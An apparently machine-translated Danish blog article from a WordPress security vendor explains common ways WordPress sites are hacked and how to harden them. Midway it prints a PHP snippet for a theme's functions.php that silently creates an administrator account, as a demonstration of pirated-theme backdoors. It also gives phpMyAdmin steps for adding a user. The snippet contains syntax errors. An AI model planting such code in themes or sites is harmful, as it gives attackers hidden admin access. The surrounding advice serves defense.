Hvor vi begynder at vise dig, hvordan og hvorfor hackere hacker websteder, er du nødt til at forstå strukturen af dit WordPress-websted. Det består af filer og en database. WordPress-filer indeholder for det meste alle indstillinger og konfigurationer, mens databasen gemmer alle data om indlæg, kommentarer, brugere og en masse andre ting.
Både elementer er nødvendige for at generere frontend af dit websted. Men begge dele kan også udnyttes af hackere.
Først skal vi se på, hvordan hackere kommer ind på WordPress-websteder.
Bemærk: Dette er ikke en vejledning i, hvordan man hacker et WordPress-websted. Det er en oplysende artikel, der skal vise dig, hvordan hackere kan udnytte sårbarheder til at hacke dit websted. Når det er sagt, lad os begynde.
6 almindelige sårbarheder, der gør det muligt for hackere at hacke WordPress-websteder
For at hacke et websted skal det have et punkt af sårbarhed. Vi har listet de almindelige sårbarheder, der findes på WordPress-websteder:
Running Outdated WordPress Installation
Omkring 44% af de hackede WordPress-websteder kørte på forældede installationer ifølge en rapport fra 2018. Som ejer af et websted vil du se hyppige opdateringer, der er tilgængelige for WordPress-installationen, som f.eks. sådan:
Sædvanligvis indeholder opdateringer nye funktioner, fejlrettelser eller løser inkompatibilitetsproblemer. Nogle gange indeholder de også WordPress-sikkerhedspatches. Det betyder, at hvis der er fundet en sikkerhedsbrist i softwaren, retter udviklerne den hurtigt og udgiver en opdatering, der fjerner fejlen.
Når den er udgivet, bliver tilstedeværelsen af en wp-sikkerhedsbrist gjort kendt for offentligheden. Hackere opsøger derefter websteder, der ikke har opdateret, finder fejlen og bruger den til at hacke sig ind på webstedet.
Så hvis du vælger ikke at opdatere din WordPress-installation, har du ikke installeret de nye sikkerhedsfunktioner, og du har givet dit websted på et fad til hackerne.
Hold altid dit WordPress-websted opdateret.
Tip: Sikkerhedspatches bliver rullet ud som mindre opdateringer. Du kan se, om der er tale om en større opdatering, hvis det er V5.2 eller V5.3. En mindre opdatering ville f.eks. være V5.2.1. Som standard er mindre opdateringer automatiske, men du kan slå det fra. Vi anbefaler, at du holder indstillingen for automatiske opdateringer slået til for mindre opdateringer.
Ud over at holde dine plugins, temaer og kerne opdateret, anbefaler vi kraftigt, at du holder dine WordPress-salte og sikkerhedsnøgler opdateret.
Brug af svage legitimationsoplysninger
Et andet almindeligt indgangspunkt for hackere er svage legitimationsoplysninger. Hackere bruger en metode kaldet brute force-angreb, hvor de programmerer robotter til at scanne dem efter WordPress-websteder på internettet og forsøger forskellige kombinationer af brugernavne og adgangskoder for at bryde ind på webstedet.
Hvis du har efterladt dit login-navn som ‘admin’, er de allerede et skridt nærmere på at få adgang til dit websted. Men hvis du har brugt almindelige adgangskoder som ‘password123’, er det nemt for dem at gætte det. Disse bots kan lave tusindvis, hvis ikke millioner af hackerforsøg på bare et sekund (anbefalet læsning – guide til beskyttelse af WordPress-loginsiden).
Vi anbefaler at ændre adgangskoden til en passphrase i kombination med tal og symboler for at gøre din adgangskode stærk som nogensinde som sådan:
Har piratkopierede temaer installeret
Premium-temaer er attraktive, og vi vil alle gerne have et godt tema til vores hjemmeside for at gøre den unik. Mange gange falder ejere af hjemmesider i bytte for gratis, crackede eller piratkopierede versioner af disse temaer. Sådanne temaer fra upålidelige kilder kan indeholde forudinstalleret malware. Ved at installere det på dit WordPress-websted installerer du også malware. Dette åbner døren for hackere. Vi har beskrevet detaljeret, hvordan dette sker senere.
Download altid kun temaer fra velrenommerede kilder, såsom WordPress-repositoriet eller markedspladser som ThemeForest og ThemeTrust.
Anvendelse af sårbare plugins
Hackere er konstant på jagt efter huller i plugins’ sikkerhed. Hvis de finder en, scanner de internettet for WordPress-websteder, der har plugin’et installeret. Dette gør det muligt for dem at hacke sig ind på tusindvis af websteder på få minutter.
Flere gange, især med gratis plugins, kan udviklerne finde ud af, at de ikke længere kan vedligeholde det og opgive plugin’et. (Dette kan også ske med temaer). I disse tilfælde vil pluginets sikkerhed bortfalde, og det udgør en trussel at have det installeret på dit websted.
Download kun plugins fra pålidelige kilder, såsom WordPress-repositoriet eller CodeCanyon. Slet jævnligt WordPress-plugins og temaer, som du ikke længere bruger. Kontroller status for de plugins, du bruger, for at se, om de bliver opdateret og vedligeholdt af udvikleren.
Brug af usikkert lokalt system
I nogle tilfælde kan det være selve din computer, der ikke er sikker. Hvis nogen hacker sig ind i dit system, kan de nemt få adgang til dit WordPress-websted, fordi wp-admin i de fleste tilfælde allerede er logget ind og åben.
Dette kan ske, hvis du ikke har en firewall eller et anti-malware-værktøj installeret på dit system.
Det anbefales, at du aldrig bruger en offentlig computer eller en offentlig usikker wifi-forbindelse på dit lokale system, som du bruger til at køre dit WordPress-websted. Hold altid malware-detektionsværktøjer aktive på dit websted.
Brug af dårlig webhosting service
Når vi vælger et hostingabonnement, har vi en tendens til at kigge efter det billigste. Men den billigste er ikke altid en garanti for gode sikkerhedsforanstaltninger.
Delte servere er måske billigere, men de udsætter også dit websted for en risiko. Du kan ikke vide, hvilke websteder du deler en webserver med, og om de har implementeret sikkerhedsprotokoller. Hvis de bliver hacket, er der chancer for, at malware-infektionen også kan sprede sig til dit websted.
Der er også tilfælde, hvor webhosts bliver kompromitteret, hvilket betyder, at alle websteder på hostingplatformen er udsat for, at hackere kan udnytte dem.”
Hvor du vælger en webhost, skal du læse om, hvad de tilbyder, og hvad kunderne har at sige om dem. Det vil hjælpe dig med at få et godt indtryk af, hvilken webhost du skal vælge.
For at finde et sårbart websted opretter hackere deres egne bots eller bruger gratis sårbarhedsscannere, der findes online, til at finkæmme internettet. Når de finder et, udnytter de den sikkerhedsbrist, det har (som dem, der er nævnt ovenfor), for at få adgang til filerne eller databasen på WordPress-webstedet.
Dernæst injicerer de kode, der vil udføre ondsindede aktiviteter som f.eks. at sende spam-e-mails, sælge ulovlige produkter osv. De injicerer også kode til at oprette nye brugerkonti eller WordPress-bagdøre, som vil hjælpe dem med at genvinde adgang til dit websted, når som helst de ønsker det.
Hvordan hacker man et WordPress-websted?
Der er utallige måder at hacke sig ind på et WordPress-websted. Her vil vi diskutere to af de mest almindelige måder, hvorpå hackere injicerer kode ind på dit websted for at oprette et nyt brugerlogin:
I. Gennem filer (præinstalleret malware i et piratkopieret tema)
Som vi diskuterede tidligere, falder mange WordPress-webstedsejere for piratkopierede temaer. Du får alle funktionerne gratis! Men en sådan software kan have et script til at oprette et nyt login-ID. Når du installerer temaet, bliver den nye brugerkonto oprettet, og hackeren kan simpelthen logge ind på dit websted fra WordPress admin.
Vi vil vise dig, hvordan du kan oprette en ny brugerkonto på dit WordPress-websted ved hjælp af din temafil. Dette vil hjælpe dig med at forstå, hvordan piratkopierede temaer hjælper en hacker med at få adgang til dit websted.
Tip: Dette kan også være praktisk, hvis du er låst ude af din wp-admin, men stadig har adgang til din webhostingkonto.
Varsel:
Det er en risikabel affære at gå ind bag kulisserne på et WordPress-websted. Det er bedst at gøre dette på et test- eller staging-websted. Hvis du vælger at gøre det på dit live-websted, skal du sikre dig, at du tager en pålidelig sikkerhedskopi. Hvis noget går galt, kan du gendanne din WordPress-backup.
Stræk 1: Log ind på din WordPress-hostingkonto. Gå til cPanel og få adgang til filhåndteringen.
Du kan også få adgang til filer via en FTP-klient som FileZilla ved hjælp af FTP-oplysninger.
Strap 2: Dine WordPress-filer ligger normalt i en mappe kaldet public_html. Inde i den kan du få adgang til wp_content/themes.
Stræk 3: Her skal du vælge det aktive tema på dit websted og redigere functions.php.
Stræk 4: Kopier og indsæt følgende kode i slutningen af filen. (Hvis der er et afsluttende tag som f.eks. ?>, skal du sørge for, at koden kommer på linjen før denne.)
$new_user_email = ’[email protected]’;
$new_user_password = ‘password’;
if(!username_exists($new_user_email))) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array(‘ID’ => $user_id, ‘nickname’ => $user_id, ‘nickname’ => $new_user_email)));
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
Rediger de to første linjer til den e-mail og adgangskode, du ønsker. Når du gemmer filen og åbner dit websted, kører koden, og du kan logge ind med disse nye legitimationsoplysninger.
Vi håber nu, at du forstår, at når du installerer et piratkopieret tema, hvis det har denne kodeblok, oprettes der en ny brugerkonto. Alt, hvad hackeren skal gøre, er at indtaste legitimationsoplysningerne og logge ind.
II. Gennem database – SQL-injektion
Dette er en anden af de mest almindelige årsager til, at WordPress-websteder bliver hacket. Til at begynde med skal du vide to ting om SQL-injektioner:
-
- WordPress bruger MySQL som standarddatabasesystem.
- For at generere frontend på et websted bruger WordPress SQL-forespørgsler til at trække data fra databasen.
Vi behøver ikke at bekymre os om, hvad det er, eller detaljerne i det for nu. Det, du skal vide, er, at denne database kun er tilgængelig via cPanel > phpMyAdmin. Men hackere finder måder at få adgang til den uden at bruge cPanel. En af de mest almindelige måder, hvorpå hackere kontakter et websteds database, er gennem sårbare formularer på et websted.
En formular er ethvert element, hvor der kan indtastes tekst, såsom WordPress-loginbaren, kontaktformularen, WordPress-blogkommentarer, abonnementspops, checkout-sider og webstedets søgebjælke.
I stedet for at indtaste de oplysninger, der bliver bedt om i formularen, ville hackeren indtaste deres ondsindede SQL-kommandoer. Da alle oplysninger, der indtastes i formularen, bliver gemt i din database, vil denne ondsindede kode finde vej ind.
For at forklare, hvordan dette sker, vil vi vise dig, hvordan du opretter en ny brugerkonto ved hjælp af din database.
→ Oprettelse af ny brugerkonto via database
Stræk 1: Få adgang til cPanel, og åbn phpMyAdmin > Databaser.
Stræk 2: Her vil du se en liste over databaser. Du skal vælge din database. (Hvis du ikke kender dit databasenavn, kan du finde denne information i din wp-config, som her).
Vi har valgt databasen i henhold til navnet i wp-config-filen.
Stræk 3: Dernæst skal du blandt de tabeller, der udfyldes i det højre panel, finde den tabel, der ender på _users (Den vil højst sandsynligt hedde wp_users).
Stræk 4: Her kan du klikke på ‘Insert’.
Stræk 5: Det vil åbne følgende skærmbillede, hvor du kan indtaste brugerens login-navn, adgangskode, e-mail og displaynavn.
Stræk 6: Klik derefter på “Go”, og dine ændringer vil blive gemt. Nu kan du logge ind på WordPress med de nye legitimationsoplysninger.
Det samme kan gøres ved at indsætte en blok af SQL-kode i databasen. I lighed med det piratkopierede tema vil koden, når den kommer ind i databasen, blive kørt, og en ny bruger vil blive oprettet. Vi kan tænke på det, som om en hacker simpelthen skaber sin egen dør i dit hjem og går direkte ind.
Hvordan stopper du hackere fra at hacke dit websted?
Der er fire hovedtrin, du skal tage for at gøre dit websted sikkert nok til at holde hackere på afstand:
Installer et WordPress-sikkerhedsplugin
Hvert WordPress-websted har brug for et sikkerhedsplugin som MalCare. Beskyt dit WordPress-websted med et sådant plugin, der vil scanne webstedet regelmæssigt. Det vil opdage enhver mistænkelig aktivitet, blokere skadelig trafik og holde hackere ude. Hvis en hacker kommer ind, bliver du advaret med det samme, og du kan rense dit websted med det samme, før de kan gøre skade.
Installer et SSL-certifikat
Dette certifikat vil give dit websted datakryptering. Det betyder, at når nogen besøger dit websted, overføres data mellem deres computer og din hjemmesides server.
Hvis de overføres i klartekst, kan hackere, der lurer på lur, nogle gange få fat i disse data. De kan læse den, stjæle den eller ændre den efter deres smag.
Men hvis den er krypteret, vil en hacker ikke kunne tyde den, selv hvis han får fat i den.
Du kan få et SSL-certifikat fra din webhost eller fra en SSL-udbyder. Hvis du er bekymret for at bruge for meget på et certifikat, tilbyder udbydere som LetsEncrypt gratis SSL.
For at lære, hvordan du installerer et SSL-certifikat, skal du se denne vejledning – Flytning af HTTP til HTTPS.
Fiks kendte sårbarheder
Som vi nævnte tidligere, er der almindelige sårbarheder i WordPress. Vi anbefaler, at du træffer følgende foranstaltninger for at minimere sårbarhederne.
-
- Opdatering af WordPress og dets temaer og plugins skal have højeste prioritet.
- Sørg for altid at bruge stærke loginoplysninger for at undgå brute-force-angreb.
- Slet regelmæssigt ubrugte temaer og plugins
- Brug aldrig nogensinde piratkopierede temaer og plugins. Download altid sådan software fra pålidelige kilder som WordPress-repositoriet, CodeCanyon eller ThemeForest.
- Brug en pålidelig webhostingudbyder.
- Hold din lokale computer beskyttet ved at installere anti-malware-software.
Hærd dit WordPress-websted
WordPress anbefaler, at alle websteder på deres platform tager visse skridt for at hærde deres websteder. Nogle af disse foranstaltninger omfatter bl.a:
- Hold en aktiv WordPress-firewall. Dette vil hjælpe med at blokere Begrænsning af antallet af loginforsøg. Hver bruger får kun tre chancer for at indtaste legitimationsoplysningerne korrekt, hvorefter de skal vælge “Glemt adgangskode” eller kontakte administratoren. Du kan bruge det samme MalCare-plugin til at gennemføre dette trin.
- Deaktivering af plugin-installationer, hvis du har flere brugere, der arbejder på webstedet. Du vil gerne sikre, at ingen installerer et plugin frit uden at kontrollere, om de er pålidelige og troværdige til at have dit websted. Dette kan gøres manuelt ved at redigere en fil kaldet wp-config.php i din WordPress-installation. Du kan også bruge MalCare-plugin til dette.
- Implementering af 2-faktor-autentificering for at verificere den person, der logger ind. Dette gøres ved at sende en engangskode til den registrerede mobil eller e-mail eller ved at bruge apps som Google Authenticator, der genererer en realtidskode hvert 30. sekund.
Der er mange flere måder, hvorpå du kan hærde dit websted. Det anbefales at implementere disse trin i henhold til dit websteds krav.
Dertil kommer, at du kan træffe yderligere et par sikkerhedsforanstaltninger. Vi anbefaler kraftigt at følge denne vejledning – Secure Your WordPress Site With wp-config.php.
Sluttanker
Vi håber, at denne artikel har givet dig en bedre forståelse af, hvordan sårbarheder kan forekomme på dit websted, og hvordan hackere kommer ind. Hackere er ikke fordomsfulde og vil angribe stort set ethvert websted. Hvis dit websted er sårbart, er der en rigtig god chance for, at du bliver hacket.
Så for at opsummere, anbefaler vi at minimere sårbarheder, installere et sikkerheds-plugin og hærde dit websted, så hackere ikke har en chance for at komme ind på dit websted.
Hold dit websted sikkert med vores MalCare Security Plugin!